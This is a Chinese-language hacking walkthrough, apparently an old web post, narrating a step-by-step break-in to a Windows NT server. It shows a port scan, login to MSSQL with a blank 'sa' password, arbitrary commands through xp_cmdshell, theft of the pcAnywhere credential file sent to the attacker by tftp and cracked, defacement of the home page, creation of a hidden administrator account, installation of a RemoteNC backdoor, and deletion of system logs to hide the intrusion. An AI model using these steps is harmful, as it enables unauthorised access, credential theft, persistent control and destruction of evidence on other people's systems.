?先ping出目标主机的IP地址：

连接IP主机:  211.154.xxx.xx...

发送  56  个字节...

接收到  56  个字节!  历时:  0毫秒

结论:  IP主机正在与Internet连接中...

接着选择打开扫描器x-way

选择高级扫描功能。输入目标IP，开始扫描。数分钟后得到扫描结果如下（结果经整理）：

主机信息

主机名:BEWDB01NOK

80(HTTP)

21(FTP  Control)

25(SMTP)

443(HTTPS)

1433(MSSQL)

5631(PCAnyWhere)

用户列表

Administrator  (Admin)  Guest  hacker  (Admin)  IUSR_BEWDB01NOK  IWAM_BEWDB01NOK  ogilvy  remoteuser  (Admin)

漏洞：

/\../readme.txt  (HTTP:  200  )

/msadc/msadcs.dll  (HTTP:  200  )

/iisadmpwd/achg.htr  (HTTP:  200  )

/_AuthChangeUrl  (HTTP:  200  )

/?PageServices  (HTTP:  200  )

上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看，

21(FTP  Control)

1433(MSSQL)

5631(PCAnyWhere)

只有这三个可用。在万一得已的情况下，我是不会用暴力破ftp的。那么只好从

1433

5631这两个端口入手了！我们知道，1433是ms-sql的服务端口，默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点，没有给ＳＡ一个口令的话，事情就好办了！先来试试看。从www.tianxing.org下一个ms-sql的客户端，在Host框中输入目标ip:211.154.xxx.xx

Username为sa

password框空，连接：

SQL>Connecting  211.154.xxx.xx

SQL>Connected  to  211.154.xxx.xx

呵呵！看来对方管理员没有对sa设置一个口令！太好了！可以在客户端以xp_cmdshell  "  "的形式运行任意dos指令了！dir一下试试看：

SQL>Command:  xp_cmdshell  "dir  c:\"

驱动器  C  中的卷没有卷标。

卷的序列号是  5CBD-664C

卷的序列号是  5CBD-664C

c:\  的目录

c:\  的目录

01-12-20  08:13p    2u2u

01-07-23  08:10p  0  AUTOEXEC.BAT

01-11-28  04:02p  84  biaoti.txt

01-07-23  08:10p  0  CONFIG.SYS

01-11-22  11:49a    InetPub

01-10-25  11:12a  15

360  kkkk.XLS

01-07-24  12:09p    MSSQL7

01-12-12  11:00a  134

217

728  pagefile.sys

01-11-30  10:59a    Program  Files

01-09-04  02:43p  136  sp_attach.sql

01-12-20  04:12p    temp

01-09-27  11:14a    unzipped

01-12-15  12:09a    WINNT

13  个文件  134

233

308  字节

54

232

576  字节可用

54

232

576  字节可用

这时我们便可以改对方的主页了！前提是先找到对方的web目录！来找找看

…………

ＸＸ分钟后，满头大汉，乖乖！竟然有Ｘ个盘，每个盘下又有ＸＸ个目录，这样找下去得何年何月？不成！要是有windows界面的形式就好找的多了！想想看，目标主机还开着5631端口，这正是pcanywhere远程管理端口呀！取了它的管理帐号和密码不就得了吗？不错的想法，呵呵……

默认情况下，pcanywhere安装于c:\Program  Files目录下，其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件，就可以用一个叫pcanywherepwd的软件快速解出密码！

且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务：

选择“工具”菜单中的tftp服务器。设置一个默认根目录，点启动即可！

然后再用ms-sql客户端在目标服务器执行如下指令：

copy  c:\progra~1\pcanywhere\data\New  Caller.CIF  c:\winnt\system32

tftp  -i  本地ip　put  New  Caller.CIF

命令执行成功，这个cif文件已被传到本地tftp目录下了！

此时，用pcanywherepwd.exe破解此文件，得到用户名为：administrator

密码为：amsrepair

打开pcanywhere  manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network  host  pc  to  control  or  ip  adress

并添上目标ip：211.154.xxx.xx

选中login  information项中的automatically  login  to  host  up  connection

并在下面的login  name和password栏中添入刚才得到的用户名和密码！确定即可。双击新建立的通道，稍等片刻即可看到了对方桌面。这下好搞了，呵呵～～在

g:\home\wwweb\目录下，终于找到了他们的index.htm。删！再手动定一个简单的文件:

hacked

保存为：index.htm

修改主页完成。

该留个后门了，这是个NT主机，用小榕的RemoteNC做后门最好不过了！

先给系统加个超级用户，用ms-sql来做：

net  user  wing  wing  /add

net  localgroup  administrators  wing  /add

从对方桌面上打开ie连到小榕的站上下载RemoteNC，然后进入命令提示行状态

键入：

RemoteNC  211.154.xxx.xx  wing  wing  LocalSystem  "RemoteNC"  "Provide  Local  CMD  Redirect"  7  123456

系统显示：

[Install  Service  as  RunasUser  Mode]

Connecting  211.154.xxx.xx  .....  Done.

Transffer  File  .....  Done.

Start  Service  .....  Done.

Now  You  can  211.154.xxx.xx  to  Connect

Have  a  Joy  安装成功

这样在任何时候都可以telnet  211.154.xxx.xx  7输入密码：123456即可使用系统任何资源了！;)

接下来该清理战场了，在ms-sql下停掉对方的ftp和www服务：

net  stop  msftpsvc

net  stop  w3svc

删除c:\winnt\sys  tem32\logfile下的所有文件。

再将服务恢复：

net  start  msftpsvc

net  start  w3svc

---

---